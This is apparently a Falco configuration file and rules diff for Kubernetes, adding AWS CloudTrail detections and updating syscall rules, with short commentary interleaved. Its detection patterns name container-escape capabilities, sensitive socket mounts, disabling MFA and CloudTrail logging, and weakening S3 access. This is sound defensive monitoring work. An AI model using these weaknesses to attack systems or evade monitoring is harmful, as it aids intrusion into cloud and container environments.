When Falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - ignore: do nothing (default when list of actions is empty)\n#   - log: log a DEBUG message noting that the buffer was full\n#   - alert: emit a Falco alert noting that the buffer was full\n#   - exit: exit Falco with a non-zero rc\n#\n# Notice it is not possible to ignore and log/alert messages at the same time.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of one message (by default).\n#\n# The messages are emitted when the percentage of dropped system calls\n# with respect the number of events in the last second\n# is greater than the given threshold (a double in the range [0, 1]).\n#\n# For debugging/testing it is possible to simulate the drops using\n# the `simulate_drops: true`. In this case the threshold does not apply.\nsyscall_event_drops:\n  threshold: 0.1\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 1\n\n# Falco uses a shared buffer between the kernel and userspace to receive\n# the events (eg., system call information) in userspace.\n#\n# Anyways, the underlying libraries can also timeout for various reasons.\n# For example, there could have been issues while reading an event.\n# Or the particular event needs to be skipped.\n# Normally, it's very unlikely that Falco does not receive events consecutively.\n#\n# Falco is able to detect such uncommon situation.\n#\n# Here you can configure the maximum number of consecutive timeouts without an event\n# after which you want Falco to alert.\n# By default this value is set to 1000 consecutive timeouts without an event at all.\n# How this value maps to a time interval depends on the CPU frequency.\nsyscall_event_timeouts:\n  max_consecutives: 1000\n\n# Falco continuously monitors outputs performance. 
When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/falco.pem\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: 'http://falco-sidekick-falcosidekick:2801'\n  user_agent: falcosecurity/falco\n\n\n# Falco supports running a gRPC server with two main binding types\n# 1. Over the network with mandatory mutual TLS authentication (mTLS)\n# 2. 
Over a local unix socket with no authentication\n# By default, the gRPC server is disabled, with no enabled services (see grpc_output)\n# please comment/uncomment and change accordingly the options below to configure it.\n# Important note: if Falco has any troubles creating the gRPC server\n# this information will be logged, however the main Falco daemon will not be stopped.\n# gRPC server over network with (mandatory) mutual TLS configuration.\n# This gRPC server is secure by default so you need to generate certificates and update their paths here.\n# By default the gRPC server is off.\n# You can configure the address to bind and expose it.\n# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.\n# grpc:\n#   enabled: true\n#   bind_address: \"0.0.0.0:5060\"\n#   # when threadiness is 0, Falco sets it by automatically figuring out the number of online cores\n#   threadiness: 0\n#   private_key: \"/etc/falco/certs/server.key\"\n#   cert_chain: \"/etc/falco/certs/server.crt\"\n#   root_certs: \"/etc/falco/certs/ca.crt\"\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\n# gRPC output service.\n# By default it is off.\n# By enabling this all the output events will be kept in memory until you read them with a gRPC client.\n# Make sure to have a consumer for them or leave this disabled.\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
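
As the inline comment in the new `falco.yaml` notes, the plugins are declared but not loaded (`load_plugins: []`). Once a meaningful `init_config`/`open_params` is set, enabling them is a one-line change, per the comment's own suggestion:

```yaml
# falco.yaml fragment -- actually load the declared plugins
load_plugins: [cloudtrail, json]
```
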
   application_rules.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -343,6 +343,447 @@
     #   condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
     #   output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
     #   priority: WARNING
+  aws_cloudtrail_rules.yaml: |+
+    #
+    # Copyright (C) 2022 The Falco Authors.
+    #
+    #
+    # Licensed under the Apache License, Version 2.0 (the "License");
+    # you may not use this file except in compliance with the License.
+    # You may obtain a copy of the License at
+    #
+    #     http://www.apache.org/licenses/LICENSE-2.0
+    #
+    # Unless required by applicable law or agreed to in writing, software
+    # distributed under the License is distributed on an "AS IS" BASIS,
+    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    # See the License for the specific language governing permissions and
+    # limitations under the License.
+    #
+
+    # All rules files related to plugins should require at least engine version 10
+    - required_engine_version: 10
+
+    - required_plugin_versions:
+      - name: cloudtrail
+        version: 0.2.3
+      - name: json
+        version: 0.2.2
+
+    # Note that this rule is disabled by default. It's useful only to
+    # verify that the cloudtrail plugin is sending events properly.  The
+    # very broad condition evt.num > 0 only works because the rule source
+    # is limited to aws_cloudtrail. This ensures that the only events that
+    # are matched against the rule are from the cloudtrail plugin (or
+    # a different plugin with the same source).
+    - rule: All Cloudtrail Events
+      desc: Match all cloudtrail events.
+      condition:
+        evt.num > 0
+      output: Some Cloudtrail Event (evtnum=%evt.num info=%evt.plugininfo ts=%evt.time.iso8601 id=%ct.id error=%ct.error)
+      priority: DEBUG
+      tags:
+      - cloud
+      - aws
+      source: aws_cloudtrail
+      enabled: false
+
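
The catch-all rule above ships disabled. To verify end to end that the cloudtrail plugin is delivering events, it can be flipped on temporarily from a local rules file (a sketch assuming rule overrides by name are honored in this version):

```yaml
# falco_rules.local.yaml -- temporary smoke test for the cloudtrail plugin
- rule: All Cloudtrail Events
  enabled: true
```
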
+    - rule: Console Login Through Assume Role
+      desc: Detect a console login through Assume Role.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+      output:
+        Detected a console login through Assume Role
+        (principal=%ct.user.principalid,
+        assumedRole=%ct.user.arn,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region)
+      priority: WARNING
+      tags:
+      - cloud
+      - aws
+      - aws_console
+      - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Login Without MFA
+      desc: Detect a console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and json.value[/additionalEventData/MFAUsed]="No"
+      output:
+        Detected a console login without MFA
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Root Login Without MFA
+      desc: Detect root console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and json.value[/additionalEventData/MFAUsed]="No"
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and ct.user.identitytype="Root"
+      output:
+        Detected a root console login without MFA.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Deactivate MFA for Root User
+      desc: Detect deactivation of the MFA configuration for the root user.
+      condition:
+        ct.name="DeactivateMFADevice" and not ct.error exists
+        and ct.user.identitytype="Root"
+        and ct.request.username="AWS ROOT USER"
+      output:
+        Multi Factor Authentication configuration has been disabled for root
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         MFA serial number=%ct.request.serialnumber)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create AWS user
+      desc: Detect creation of a new AWS user.
+      condition:
+        ct.name="CreateUser" and not ct.error exists
+      output:
+        A new AWS user has been created
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         new user created=%ct.request.username)
+      priority: INFO
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create Group
+      desc: Detect creation of a new user group.
+      condition:
+        ct.name="CreateGroup" and not ct.error exists
+      output:
+        A new user group has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Delete Group
+      desc: Detect deletion of a user group.
+      condition:
+        ct.name="DeleteGroup" and not ct.error exists
+      output:
+        A user group has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: ECS Service Created
+      desc: Detect creation of a new service in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        ct.name="CreateService" and
+        not ct.error exists
+      output:
+        A new service has been created in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        service name=%ct.request.servicename,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: ECS Task Run or Started
+      desc: Detect the start of a new task in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        (ct.name="RunTask" or ct.name="StartTask") and
+        not ct.error exists
+      output:
+        A new task has been started in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: Create Lambda Function
+      desc: Detect creation of a Lambda function.
+      condition:
+        ct.name="CreateFunction20150331" and not ct.error exists
+      output:
+        Lambda function has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Code
+      desc: Detect updates to the code of a Lambda function.
+      condition:
+        ct.name="UpdateFunctionCode20150331v2" and not ct.error exists
+      output:
+        The code of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Configuration
+      desc: Detect updates to a Lambda function configuration.
+      condition:
+        ct.name="UpdateFunctionConfiguration20150331v2" and not ct.error exists
+      output:
+        The configuration of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Run Instances
+      desc: Detect launching of a specified number of instances.
+      condition:
+        ct.name="RunInstances" and not ct.error exists
+      output:
+        A number of instances have been launched.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    # Only instances launched on regions in this list are approved.
+    - list: approved_regions
+      items:
+        - us-east-0
+
+    - rule: Run Instances in Non-approved Region
+      desc: Detect launching of a specified number of instances in a non-approved region.
+      condition:
+        ct.name="RunInstances" and not ct.error exists and
+        not ct.region in (approved_regions)
+      output:
+        A number of instances have been launched in a non-approved region.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid,
+         image id=%json.value[/responseElements/instancesSet/items/0/instanceId])
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Encryption
+      desc: Detect deletion of a bucket's encryption configuration.
+      condition:
+        ct.name="DeleteBucketEncryption" and not ct.error exists
+      output:
+        An encryption configuration for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Public Access Block
+      desc: Detect deletion of the public access block on a bucket.
+      condition:
+        ct.name="PutBucketPublicAccessBlock" and not ct.error exists and
+        json.value[/requestParameters/publicAccessBlock]="" and
+          (json.value[/requestParameters/PublicAccessBlockConfiguration/RestrictPublicBuckets]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicPolicy]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicAcls]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/IgnorePublicAcls]=false)
+      output:
+        A public access block for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
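The condition above fires on a successful `PutBucketPublicAccessBlock` call that turns off any of the four protection flags. A hedged Python sketch of that check — the function name and the reduced event shape are illustrative:

```python
# Approximates the "Delete Bucket Public Access Block" condition: at least
# one of the four PublicAccessBlockConfiguration flags must be explicitly
# set to false on a successful call.

WEAKENING_FLAGS = (
    "RestrictPublicBuckets",
    "BlockPublicPolicy",
    "BlockPublicAcls",
    "IgnorePublicAcls",
)

def public_access_block_weakened(event: dict) -> bool:
    cfg = event.get("requestParameters", {}).get(
        "PublicAccessBlockConfiguration", {})
    return (
        event.get("eventName") == "PutBucketPublicAccessBlock"
        and "errorCode" not in event
        and any(cfg.get(flag) is False for flag in WEAKENING_FLAGS)
    )
```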
+
+    - rule: List Buckets
+      desc: Detect listing of all S3 buckets.
+      condition:
+        ct.name="ListBuckets" and not ct.error exists
+      output:
+        A list of all S3 buckets has been requested.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         host=%ct.request.host)
+      priority: WARNING
+      enabled: false
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket ACL
+      desc: Detect setting the permissions on an existing bucket using access control lists.
+      condition:
+        ct.name="PutBucketAcl" and not ct.error exists
+      output:
+        The permissions on an existing bucket have been set using access control lists.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket Policy
+      desc: Detect applying an Amazon S3 bucket policy to an Amazon S3 bucket.
+      condition:
+        ct.name="PutBucketPolicy" and not ct.error exists
+      output:
+        An Amazon S3 bucket policy has been applied to an Amazon S3 bucket.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket,
+         policy=%ct.request.policy)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Trail Created
+      desc: Detect creation of a new trail.
+      condition:
+        ct.name="CreateTrail" and not ct.error exists
+      output:
+        A new trail has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         trail name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Logging Disabled
+      desc: CloudTrail logging has been disabled; this could be malicious.
+      condition:
+        ct.name="StopLogging" and not ct.error exists
+      output:
+        The CloudTrail logging has been disabled.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         resource name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
   falco_rules.local.yaml: |
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -376,7 +817,7 @@
     # Or override/append to any rule, macro, or list from the Default Rules
   falco_rules.yaml: |
     #
-    # Copyright (C) 2020 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -406,13 +847,13 @@
     #   condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))
 
     - macro: open_write
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_read
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_directory
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
 
     - macro: never_true
       condition: (evt.num=0)
@@ -440,11 +881,14 @@
       condition: rename or remove
 
     - macro: spawned_process
-      condition: evt.type = execve and evt.dir=<
+      condition: evt.type in (execve, execveat) and evt.dir=<
 
     - macro: create_symlink
       condition: evt.type in (symlink, symlinkat) and evt.dir=<
 
+    - macro: create_hardlink
+      condition: evt.type in (link, linkat) and evt.dir=<
+
     - macro: chmod
       condition: (evt.type in (chmod, fchmod, fchmodat) and evt.dir=<)
 
@@ -593,13 +1037,13 @@
     - list: deb_binaries
       items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, dpkg-divert, apt, apt-get, aptitude,
         frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key,
-        apt-listchanges, unattended-upgr, apt-add-reposit, apt-config, apt-cache, apt.systemd.dai
+        apt-listchanges, unattended-upgr, apt-add-reposit, apt-cache, apt.systemd.dai
         ]
 
     # The truncated dpkg-preconfigu is intentional, process names are
-    # truncated at the sysdig level.
+    # truncated at the falcosecurity-libs level.
     - list: package_mgmt_binaries
-      items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
+      items: [rpm_binaries, deb_binaries, update-alternat, gem, npm, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
 
     - macro: package_mgmt_procs
       condition: proc.name in (package_mgmt_binaries)
@@ -710,7 +1154,7 @@
     # for efficiency.
     - macro: inbound_outbound
       condition: >
-        ((((evt.type in (accept,listen,connect) and evt.dir=<)) or
+        ((((evt.type in (accept,listen,connect) and evt.dir=<)) and
          (fd.typechar = 4 or fd.typechar = 6)) and
          (fd.ip != "0.0.0.0" and fd.net != "127.0.0.0/8") and
          (evt.rawres >= 0 or evt.res = EINPROGRESS))
@@ -817,6 +1261,9 @@
     - list: shell_config_directories
       items: [/etc/zsh]
 
+    - macro: user_known_shell_config_modifiers
+      condition: (never_true)
+
     - rule: Modify Shell Configuration File
       desc: Detect attempt to modify shell configuration files
       condition: >
@@ -826,6 +1273,7 @@
          fd.directory in (shell_config_directories))
         and not proc.name in (shell_binaries)
         and not exe_running_docker_save
+        and not user_known_shell_config_modifiers
       output: >
         a shell configuration file has been modified (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline pcmdline=%proc.pcmdline file=%fd.name container_id=%container.id image=%container.image.repository)
       priority:
@@ -938,7 +1386,7 @@
 
     # Qualys seems to run a variety of shell subprocesses, at various
     # levels. This checks at a few levels without the cost of a full
-    # proc.aname, which traverses the full parent heirarchy.
+    # proc.aname, which traverses the full parent hierarchy.
     - macro: run_by_qualys
       condition: >
         (proc.pname=qualys-cloud-ag or
@@ -1149,6 +1597,9 @@
     - macro: centrify_writing_krb
       condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5)
 
+    - macro: sssd_writing_krb
+      condition: (proc.name=adcli and proc.aname[2]=sssd and fd.name startswith /etc/krb5)
+
     - macro: cockpit_writing_conf
       condition: >
         ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la)
@@ -1477,7 +1928,7 @@
       condition: (proc.name=oc and fd.name startswith /etc/origin/node)
 
     - macro: keepalived_writing_conf
-      condition: (proc.name=keepalived and fd.name=/etc/keepalived/keepalived.conf)
+      condition: (proc.name in (keepalived, kube-keepalived) and fd.name=/etc/keepalived/keepalived.conf)
 
     - macro: etcd_manager_updating_dns
       condition: (container and proc.name=etcd-manager and fd.name=/etc/hosts)
@@ -1592,6 +2043,7 @@
         and not nginx_writing_certs
         and not chef_client_writing_conf
         and not centrify_writing_krb
+        and not sssd_writing_krb
         and not cockpit_writing_conf
         and not ipsec_writing_conf
         and not httpd_writing_ssl_conf
@@ -2181,7 +2633,7 @@
               registry.access.redhat.com/sematext/agent,
               registry.access.redhat.com/sematext/logagent]
 
-    # These container images are allowed to run with --privileged
+    # These container images are allowed to run with --privileged and full set of capabilities
     - list: falco_privileged_images
       items: [
         docker.io/calico/node,
@@ -2199,10 +2651,12 @@
         gke.gcr.io/kube-proxy,
         gke.gcr.io/gke-metadata-server,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         gcr.io/google-containers/prometheus-to-sd,
         k8s.gcr.io/ip-masq-agent-amd64,
         k8s.gcr.io/kube-proxy,
         k8s.gcr.io/prometheus-to-sd,
+        public.ecr.aws/falcosecurity/falco,
         quay.io/calico/node,
         sysdig/sysdig,
         sematext_images
@@ -2231,7 +2685,7 @@
     - list: falco_sensitive_mount_images
       items: [
         docker.io/sysdig/sysdig, sysdig/sysdig,
-        docker.io/falcosecurity/falco, falcosecurity/falco,
+        docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco,
         gcr.io/google_containers/hyperkube,
         gcr.io/google_containers/kube-proxy, docker.io/calico/node,
         docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
@@ -2247,19 +2701,6 @@
                   container.image.repository in (falco_sensitive_mount_images) or
                   container.image.repository startswith quay.io/sysdig/)
 
-    # These container images are allowed to run with hostnetwork=true
-    - list: falco_hostnetwork_images
-      items: [
-        gcr.io/google-containers/prometheus-to-sd,
-        gcr.io/projectcalico-org/typha,
-        gcr.io/projectcalico-org/node,
-        gke.gcr.io/gke-metadata-server,
-        gke.gcr.io/kube-proxy,
-        gke.gcr.io/netd-amd64,
-        k8s.gcr.io/ip-masq-agent-amd64
-        k8s.gcr.io/prometheus-to-sd,
-        ]
-
     # Add conditions to this macro (probably in a separate file,
     # overwriting this macro) to specify additional containers that are
     # allowed to perform sensitive mounts.
@@ -2280,14 +2721,40 @@
       priority: INFO
       tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
 
+    # These capabilities were used in the past to escape from containers
+    - macro: excessively_capable_container
+      condition: >
+        (thread.cap_permitted contains CAP_SYS_ADMIN
+        or thread.cap_permitted contains CAP_SYS_MODULE
+        or thread.cap_permitted contains CAP_SYS_RAWIO
+        or thread.cap_permitted contains CAP_SYS_PTRACE
+        or thread.cap_permitted contains CAP_SYS_BOOT
+        or thread.cap_permitted contains CAP_SYSLOG
+        or thread.cap_permitted contains CAP_DAC_READ_SEARCH
+        or thread.cap_permitted contains CAP_NET_ADMIN
+        or thread.cap_permitted contains CAP_BPF)
+
+    - rule: Launch Excessively Capable Container
+      desc: Detect container started with a powerful set of capabilities. Exceptions are made for known trusted images.
+      condition: >
+        container_started and container
+        and excessively_capable_container
+        and not falco_privileged_containers
+        and not user_privileged_containers
+      output: Excessively capable container started (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag cap_permitted=%thread.cap_permitted)
+      priority: INFO
+      tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
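The new macro checks Falco's `%thread.cap_permitted` string with `contains`, once per capability. A minimal Python sketch of the same membership test — the capability list is copied from the macro; everything else is illustrative:

```python
# Capabilities that have historically been usable for container escapes,
# matching the excessively_capable_container macro above.
ESCAPE_CAPS = (
    "CAP_SYS_ADMIN", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_PTRACE",
    "CAP_SYS_BOOT", "CAP_SYSLOG", "CAP_DAC_READ_SEARCH", "CAP_NET_ADMIN",
    "CAP_BPF",
)

def excessively_capable(cap_permitted: str) -> bool:
    # cap_permitted mimics Falco's %thread.cap_permitted output, a
    # space-separated list such as "CAP_CHOWN CAP_NET_ADMIN"; `in` mirrors
    # the substring semantics of Falco's `contains` operator.
    return any(cap in cap_permitted for cap in ESCAPE_CAPS)
```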
+
+
     # For now, only considering a full mount of /etc as
     # sensitive. Ideally, this would also consider all subdirectories
-    # below /etc as well, but the globbing mechanism used by sysdig
+    # below /etc as well, but the globbing mechanism
     # doesn't allow exclusions of a full pattern, only single characters.
     - macro: sensitive_mount
       condition: (container.mount.dest[/proc*] != "N/A" or
                   container.mount.dest[/var/run/docker.sock] != "N/A" or
                   container.mount.dest[/var/run/crio/crio.sock] != "N/A" or
+                  container.mount.dest[/run/containerd/containerd.sock] != "N/A" or
                   container.mount.dest[/var/lib/kubelet] != "N/A" or
                   container.mount.dest[/var/lib/kubelet/pki] != "N/A" or
                   container.mount.dest[/] != "N/A" or
@@ -2415,7 +2882,8 @@
         '"sh -c  -t -i"',
         '"sh -c openssl version"',
         '"bash -c id -Gn kafadmin"',
-        '"sh -c /bin/sh -c ''date +%%s''"'
+        '"sh -c /bin/sh -c ''date +%%s''"',
+        '"sh -c /usr/share/lighttpd/create-mime.conf.pl"'
         ]
 
     # This list allows for easy additions to the set of commands allowed
@@ -2574,7 +3042,7 @@
     #   output: "sshd sent error message to syslog (error=%evt.buffer)"
     #   priority: WARNING
 
-    - macro: somebody_becoming_themself
+    - macro: somebody_becoming_themselves
       condition: ((user.name=nobody and evt.arg.uid=nobody) or
                   (user.name=www-data and evt.arg.uid=www-data) or
                   (user.name=_apt and evt.arg.uid=_apt) or
@@ -2612,7 +3080,7 @@
         evt.type=setuid and evt.dir=>
         and (known_user_in_container or not container)
         and not (user.name=root or user.uid=0)
-        and not somebody_becoming_themself
+        and not somebody_becoming_themselves
         and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries,
                               nomachine_binaries)
         and not proc.name startswith "runc:"
@@ -2636,7 +3104,7 @@
         activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded.
         Activity in containers is also excluded--some containers create custom users on top
         of a base linux distribution at startup.
-        Some innocuous commandlines that don't actually change anything are excluded.
+        Some innocuous command lines that don't actually change anything are excluded.
       condition: >
         spawned_process and proc.name in (user_mgmt_binaries) and
         not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and
@@ -2672,7 +3140,7 @@
       desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev.
       condition: >
         fd.directory = /dev and
-        (evt.type = creat or ((evt.type = open or evt.type = openat) and evt.arg.flags contains O_CREAT))
+        (evt.type = creat or (evt.type in (open,openat,openat2) and evt.arg.flags contains O_CREAT))
         and not proc.name in (dev_creation_binaries)
         and not fd.name in (allowed_dev_files)
         and not fd.name startswith /dev/tty
@@ -2686,7 +3154,7 @@
     # explicitly enumerate the container images that you want to allow
